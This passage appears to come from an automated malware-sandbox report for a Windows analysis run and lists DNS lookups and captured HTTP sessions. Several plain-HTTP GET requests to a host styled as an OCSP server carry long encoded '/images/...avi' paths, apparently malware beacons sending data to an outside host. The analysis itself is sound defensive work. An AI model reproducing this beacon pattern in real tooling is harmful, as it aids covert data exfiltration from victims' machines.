                                                Sep 10, 2021 11:28:40.335247040 CEST5039453192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:40.384668112 CEST53503948.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:43.697774887 CEST5853053192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:43.731348991 CEST53585308.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:44.689608097 CEST5853053192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:44.726703882 CEST53585308.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:44.884803057 CEST5381353192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:44.925837040 CEST53538138.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:45.780903101 CEST5853053192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:45.814582109 CEST53585308.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:45.876383066 CEST5381353192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:45.905706882 CEST53538138.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:46.895987988 CEST5381353192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:46.931405067 CEST53538138.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:47.782418966 CEST5853053192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:47.816689014 CEST53585308.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:48.857429028 CEST5381353192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:48.894952059 CEST53538138.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:51.719892979 CEST6373253192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:51.749866009 CEST53637328.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:51.833105087 CEST5853053192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:51.866637945 CEST53585308.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:52.904275894 CEST5381353192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:52.939781904 CEST53538138.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:54.897401094 CEST5734453192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:54.932523012 CEST53573448.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:56.957859993 CEST5445053192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:56.990983009 CEST53544508.8.8.8192.168.2.5
                                                Sep 10, 2021 11:28:58.685632944 CEST5926153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:28:58.718434095 CEST53592618.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:01.923851013 CEST5715153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:01.948863029 CEST53571518.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:06.193099976 CEST5941353192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:06.226480961 CEST53594138.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:09.472971916 CEST6051653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:09.506478071 CEST53605168.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:09.558235884 CEST5164953192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:09.591897964 CEST53516498.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:10.559912920 CEST5164953192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:10.593313932 CEST53516498.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:11.467993975 CEST6508653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:11.501324892 CEST53650868.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:11.561897993 CEST5164953192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:11.595700979 CEST53516498.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:13.612844944 CEST5164953192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:13.647855043 CEST53516498.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:14.872776985 CEST5643253192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:14.908098936 CEST53564328.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:17.612792015 CEST5164953192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:17.641422033 CEST53516498.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:18.531658888 CEST5292953192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:18.567233086 CEST53529298.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:19.074461937 CEST6431753192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:19.104486942 CEST53643178.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:29.237571001 CEST6100453192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:29.270366907 CEST5689553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:29.271456957 CEST53610048.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:29.313858986 CEST53568958.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:30.026762009 CEST6237253192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:30.055349112 CEST53623728.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:35.589313984 CEST6151553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:35.626282930 CEST53615158.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:37.713468075 CEST5667553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:37.746651888 CEST53566758.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:43.380201101 CEST5717253192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:43.414191008 CEST53571728.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:46.803185940 CEST5526753192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:46.843158007 CEST53552678.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:51.519062996 CEST5096953192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:51.551887989 CEST53509698.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:54.840034962 CEST6436253192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:54.872912884 CEST53643628.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:58.633409023 CEST5476653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:58.663350105 CEST53547668.8.8.8192.168.2.5
                                                Sep 10, 2021 11:29:59.667192936 CEST5476653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:29:59.697319031 CEST53547668.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:00.667237043 CEST5476653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:00.705388069 CEST53547668.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:02.524331093 CEST6144653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:02.559146881 CEST53614468.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:02.729496002 CEST5476653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:02.760375977 CEST53547668.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:04.103563070 CEST5751553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:04.139197111 CEST53575158.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:05.097162008 CEST5751553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:05.125163078 CEST53575158.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:06.144722939 CEST5751553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:06.173379898 CEST53575158.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:06.769252062 CEST5476653192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:06.800507069 CEST53547668.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:08.191401958 CEST5751553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:08.219232082 CEST53575158.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:12.248290062 CEST5751553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:12.288125038 CEST53575158.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:16.321193933 CEST5819953192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:16.352951050 CEST53581998.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:21.265086889 CEST6522153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:21.298093081 CEST53652218.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:22.266185999 CEST6522153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:22.291155100 CEST53652218.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:23.266736984 CEST6522153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:23.294195890 CEST53652218.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:25.387281895 CEST6522153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:25.413050890 CEST53652218.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:26.722629070 CEST6157353192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:26.758687019 CEST53615738.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:29.401053905 CEST6522153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:29.434274912 CEST53652218.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:36.584817886 CEST5656253192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:36.634388924 CEST53565628.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:37.573323011 CEST5359153192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:37.612714052 CEST53535918.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:38.127902031 CEST5968853192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:38.162178040 CEST53596888.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:38.446222067 CEST5603253192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:38.482167006 CEST53560328.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:38.843164921 CEST6115053192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:38.871268988 CEST53611508.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:39.226557016 CEST6345853192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:39.259440899 CEST53634588.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:39.584393024 CEST5042253192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:39.609138012 CEST53504228.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:40.076759100 CEST5324753192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:40.112530947 CEST53532478.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:40.656224012 CEST5854453192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:40.685964108 CEST53585448.8.8.8192.168.2.5
                                                Sep 10, 2021 11:30:41.008152962 CEST5381453192.168.2.58.8.8.8
                                                Sep 10, 2021 11:30:41.041130066 CEST53538148.8.8.8192.168.2.5
                                                Sep 10, 2021 11:31:00.052069902 CEST5130553192.168.2.58.8.8.8
                                                Sep 10, 2021 11:31:00.094192028 CEST53513058.8.8.8192.168.2.5

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                Sep 10, 2021 11:28:16.219919920 CEST192.168.2.58.8.8.80xcb34Standard query (0)www.msn.comA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:19.458614111 CEST192.168.2.58.8.8.80xc3dfStandard query (0)web.vortex.data.msn.comA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:19.808762074 CEST192.168.2.58.8.8.80x7fc4Standard query (0)geolocation.onetrust.comA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:19.886234045 CEST192.168.2.58.8.8.80xf1bbStandard query (0)contextual.media.netA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:20.111187935 CEST192.168.2.58.8.8.80x8d6cStandard query (0)btloader.comA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:22.062802076 CEST192.168.2.58.8.8.80xad2eStandard query (0)hblg.media.netA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:22.938153982 CEST192.168.2.58.8.8.80xd68dStandard query (0)lg3.media.netA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:23.347479105 CEST192.168.2.58.8.8.80x73bdStandard query (0)cvision.media.netA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:23.511346102 CEST192.168.2.58.8.8.80x5081Standard query (0)srtb.msn.comA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:24.558005095 CEST192.168.2.58.8.8.80x85e9Standard query (0)img.img-taboola.comA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:29.270366907 CEST192.168.2.58.8.8.80x17c6Standard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:35.589313984 CEST192.168.2.58.8.8.80xd4fStandard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:51.519062996 CEST192.168.2.58.8.8.80xf8dStandard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)
                                                Sep 10, 2021 11:30:16.321193933 CEST192.168.2.58.8.8.80xaa17Standard query (0)ocsp.sca1b.amazontrust.comA (IP address)IN (0x0001)

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                Sep 10, 2021 11:28:16.247761965 CEST8.8.8.8192.168.2.50xcb34No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                Sep 10, 2021 11:28:19.499867916 CEST8.8.8.8192.168.2.50xc3dfNo error (0)web.vortex.data.msn.comweb.vortex.data.microsoft.comCNAME (Canonical name)IN (0x0001)
                                                Sep 10, 2021 11:28:19.839265108 CEST8.8.8.8192.168.2.50x7fc4No error (0)geolocation.onetrust.com104.20.185.68A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:19.839265108 CEST8.8.8.8192.168.2.50x7fc4No error (0)geolocation.onetrust.com104.20.184.68A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:19.921276093 CEST8.8.8.8192.168.2.50xf1bbNo error (0)contextual.media.net2.18.160.23A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:20.146970034 CEST8.8.8.8192.168.2.50x8d6cNo error (0)btloader.com104.26.7.139A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:20.146970034 CEST8.8.8.8192.168.2.50x8d6cNo error (0)btloader.com104.26.6.139A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:20.146970034 CEST8.8.8.8192.168.2.50x8d6cNo error (0)btloader.com172.67.70.134A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:22.101077080 CEST8.8.8.8192.168.2.50xad2eNo error (0)hblg.media.net2.18.160.23A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:22.975914955 CEST8.8.8.8192.168.2.50xd68dNo error (0)lg3.media.net2.18.160.23A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:23.389220953 CEST8.8.8.8192.168.2.50x73bdNo error (0)cvision.media.netcvision.media.net.edgekey.netCNAME (Canonical name)IN (0x0001)
                                                Sep 10, 2021 11:28:23.536730051 CEST8.8.8.8192.168.2.50x5081No error (0)srtb.msn.comwww.msn.comCNAME (Canonical name)IN (0x0001)
                                                Sep 10, 2021 11:28:23.536730051 CEST8.8.8.8192.168.2.50x5081No error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)
                                                Sep 10, 2021 11:28:24.585437059 CEST8.8.8.8192.168.2.50x85e9No error (0)img.img-taboola.comtls13.taboola.map.fastly.netCNAME (Canonical name)IN (0x0001)
                                                Sep 10, 2021 11:28:24.585437059 CEST8.8.8.8192.168.2.50x85e9No error (0)tls13.taboola.map.fastly.net151.101.1.44A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:24.585437059 CEST8.8.8.8192.168.2.50x85e9No error (0)tls13.taboola.map.fastly.net151.101.65.44A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:24.585437059 CEST8.8.8.8192.168.2.50x85e9No error (0)tls13.taboola.map.fastly.net151.101.129.44A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:28:24.585437059 CEST8.8.8.8192.168.2.50x85e9No error (0)tls13.taboola.map.fastly.net151.101.193.44A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:29.313858986 CEST8.8.8.8192.168.2.50x17c6No error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:29.313858986 CEST8.8.8.8192.168.2.50x17c6No error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:29.313858986 CEST8.8.8.8192.168.2.50x17c6No error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:29.313858986 CEST8.8.8.8192.168.2.50x17c6No error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:35.626282930 CEST8.8.8.8192.168.2.50xd4fNo error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:35.626282930 CEST8.8.8.8192.168.2.50xd4fNo error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:35.626282930 CEST8.8.8.8192.168.2.50xd4fNo error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:35.626282930 CEST8.8.8.8192.168.2.50xd4fNo error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:51.551887989 CEST8.8.8.8192.168.2.50xf8dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:51.551887989 CEST8.8.8.8192.168.2.50xf8dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:51.551887989 CEST8.8.8.8192.168.2.50xf8dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:29:51.551887989 CEST8.8.8.8192.168.2.50xf8dNo error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:30:16.352951050 CEST8.8.8.8192.168.2.50xaa17No error (0)ocsp.sca1b.amazontrust.com13.225.29.204A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:30:16.352951050 CEST8.8.8.8192.168.2.50xaa17No error (0)ocsp.sca1b.amazontrust.com13.225.29.199A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:30:16.352951050 CEST8.8.8.8192.168.2.50xaa17No error (0)ocsp.sca1b.amazontrust.com13.225.29.132A (IP address)IN (0x0001)
                                                Sep 10, 2021 11:30:16.352951050 CEST8.8.8.8192.168.2.50xaa17No error (0)ocsp.sca1b.amazontrust.com13.225.29.191A (IP address)IN (0x0001)

                                                HTTP Request Dependency Graph

                                                • https:
                                                  • geolocation.onetrust.com
                                                  • btloader.com
                                                  • img.img-taboola.com
                                                • ocsp.sca1b.amazontrust.com

                                                HTTP Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.549768104.20.185.68443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                1192.168.2.549782104.26.7.139443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                10192.168.2.54995513.225.29.19980
                                                TimestampkBytes transferredDirectionData
                                                Sep 10, 2021 11:29:51.585664034 CEST12998OUTGET /images/SYju0gEPY/daXUIALH6wAr_2FEeL7Y/6GIgSGWYRYPOXzpvhXM/3guBTTFjN4dorGgaYOMkm4/M_2Bjjmvlz4ur/UEsZa_2B/wtLFrALI7COJAH4Q2eJxA3E/X6kgoUtw4W/_2FEmmXCN8gAZkdpR/hFpN7ViLd8Sb/HUuTC1Ynxdq/BFB70oLC0oipHY/frptiWELKhVA4yo7R_2Bx/tVP.avi HTTP/1.1
                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: ocsp.sca1b.amazontrust.com
                                                Connection: Keep-Alive
                                                Sep 10, 2021 11:29:51.669495106 CEST13000INHTTP/1.1 200 OK
                                                Content-Type: application/ocsp-response
                                                Content-Length: 5
                                                Connection: keep-alive
                                                Accept-Ranges: bytes
                                                Cache-Control: public, max-age=300
                                                Date: Fri, 10 Sep 2021 09:29:51 GMT
                                                ETag: "5f457bf7-5"
                                                Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
                                                Server: nginx
                                                X-Cache: Miss from cloudfront
                                                Via: 1.1 d6561aeeccb210202cf78b99f07c5235.cloudfront.net (CloudFront)
                                                X-Amz-Cf-Pop: CDG3-C2
                                                X-Amz-Cf-Id: VnegLro7JD62tXhPpcidZ6U3Q5V07_UmNarc4wxisJNmh537b-vMXg==
                                                Data Raw: 30 03 0a 01 06
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                11192.168.2.54996913.225.29.20480C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData
                                                Sep 10, 2021 11:30:16.404545069 CEST13045OUTGET /images/nGZ4P_2FwoiJjdC/WbaZyFGl8u4o5V_2Bt/3MW1dlOE3/XNAi9tLxJCuE0YPRtZlT/uSBAv7K7l3rJyZ38tNQ/bWQ8urEO340TOAzpTLrfn1/g6N8UXuxX3Z6B/2PtIG78y/5FZLGxch4duFejHp2UCYdv6/DXApgqy328/SmC86X3WgjhyNBdkg/98vDKpf2NWlj/jd6j019UoWb/RKR_2BwuTm2z0Lvh4aKdTS/q.avi HTTP/1.1
                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: ocsp.sca1b.amazontrust.com
                                                Connection: Keep-Alive
                                                Sep 10, 2021 11:30:16.717156887 CEST13046INHTTP/1.1 200 OK
                                                Content-Type: application/ocsp-response
                                                Content-Length: 5
                                                Connection: keep-alive
                                                Accept-Ranges: bytes
                                                Cache-Control: public, max-age=300
                                                Date: Fri, 10 Sep 2021 09:30:16 GMT
                                                ETag: "5fac0ccd-5"
                                                Last-Modified: Wed, 11 Nov 2020 16:09:49 GMT
                                                Server: nginx
                                                X-Cache: Miss from cloudfront
                                                Via: 1.1 12b082104e9893409b9ae6386e88d351.cloudfront.net (CloudFront)
                                                X-Amz-Cf-Pop: CDG3-C2
                                                X-Amz-Cf-Id: pz9Fybsh0l1w2fKUrC935xH53SlLjUabQxULZ_woeXDtm6L2foZa4g==
                                                Data Raw: 30 03 0a 01 06
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                2192.168.2.549816151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                3192.168.2.549819151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                4192.168.2.549820151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                5192.168.2.549817151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                6192.168.2.549821151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                7192.168.2.549818151.101.1.44443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                8192.168.2.54990213.225.29.19980
                                                TimestampkBytes transferredDirectionData
                                                Sep 10, 2021 11:29:29.369950056 CEST8731OUTGET /images/MouQH3qgSHj8rVq2CjdZ/guD6i2fAIsR0IrZ7zv_/2Fg884tCuKHo7vJx28ckOK/PeUsib7MohdVp/hsP2dh6G/LbOHfPo3POSkJrn8i6_2FAi/5MivSFUwCP/GbFXfy5Ss56TDN93M/Lmrkp1CfI0wl/UQ_2FNpOa3h/8j_2FJtcVth8pZ/xW1yFjsbSZ4ddCtjBXOBw/FadwJ_2F/5k0k.avi HTTP/1.1
                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: ocsp.sca1b.amazontrust.com
                                                Connection: Keep-Alive
                                                Sep 10, 2021 11:29:29.450870037 CEST8732INHTTP/1.1 200 OK
                                                Content-Type: application/ocsp-response
                                                Content-Length: 5
                                                Connection: keep-alive
                                                Accept-Ranges: bytes
                                                Cache-Control: public, max-age=300
                                                Date: Fri, 10 Sep 2021 09:29:29 GMT
                                                ETag: "5f457bf7-5"
                                                Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
                                                Server: nginx
                                                X-Cache: Miss from cloudfront
                                                Via: 1.1 d6bff47a79bb5fa9800d9ee4b2b92146.cloudfront.net (CloudFront)
                                                X-Amz-Cf-Pop: CDG3-C2
                                                X-Amz-Cf-Id: TolSfPdSUby3f19eRp5suDoRVbNDu7SM9kd9wr_xcYGqoK69heZmtw==
                                                Data Raw: 30 03 0a 01 06
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                9192.168.2.54991013.225.29.13280
                                                TimestampkBytes transferredDirectionData
                                                Sep 10, 2021 11:29:35.701522112 CEST8789OUTGET /images/9sYl8HCwVTgVyQ/NT8tJmO80ConCL2bjdFpK/YmrgZEf9KiUxgNmM/mbsOKShkLL9xEyV/cqM19yrWFAKIfNZCre/1_2F2h8X8/jegaI0S3pTjU6iR1JpPX/UMhOIwx5PH6P2vnzG0z/rGk07QRgyLizPAe2h48XfS/OWkfSj0_2F4iO/h7HzpUkv/m1kaqwRRUSi9pYEVBNe2Vsg/k_2FWV7h/Of76U6bg46X/dpq.avi HTTP/1.1
                                                Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: ocsp.sca1b.amazontrust.com
                                                Connection: Keep-Alive
                                                Sep 10, 2021 11:29:35.792062998 CEST8790INHTTP/1.1 200 OK
                                                Content-Type: application/ocsp-response
                                                Content-Length: 5
                                                Connection: keep-alive
                                                Accept-Ranges: bytes
                                                Cache-Control: public, max-age=300
                                                Date: Fri, 10 Sep 2021 09:29:35 GMT
                                                ETag: "5f457bf7-5"
                                                Last-Modified: Tue, 25 Aug 2020 21:00:39 GMT
                                                Server: nginx
                                                X-Cache: Miss from cloudfront
                                                Via: 1.1 89cec266da5afe1c0fd332f7f04e94e3.cloudfront.net (CloudFront)
                                                X-Amz-Cf-Pop: CDG3-C2
                                                X-Amz-Cf-Id: -oUGTVu-GkLdPQGRGAYqBQoQzjfxdzIhndGHl-cGPlyzfIPa107SRQ==
                                                Data Raw: 30 03 0a 01 06
                                                Data Ascii: 0


                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                0192.168.2.549768104.20.185.68443C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                TimestampkBytes transferredDirectionData
                                                2021-09-10 09:28:19 UTC0OUTGET /cookieconsentpub/v1/geo/location HTTP/1.1
                                                Accept: application/javascript, */*;q=0.8
                                                Referer: https://www.msn.com/de-ch/?ocid=iehp
                                                Accept-Language: en-US
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                Accept-Encoding: gzip, deflate
                                                Host: geolocation.onetrust.com
                                                Connection: Keep-Alive
                                                2021-09-10 09:28:19 UTC0INHTTP/1.1 200 OK
                                                Date: Fri, 10 Sep 2021 09:28:19 GMT
                                                Content-Type: text/javascript
                                                Content-Length: 182
                                                Connection: close
                                                Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Server: cloudflare
                                                CF-RAY: 68c7a0245b38c2bd-FRA
